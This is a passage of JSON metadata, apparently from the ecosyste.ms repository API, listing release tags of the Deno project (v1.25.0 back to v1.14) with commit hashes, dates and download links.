/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1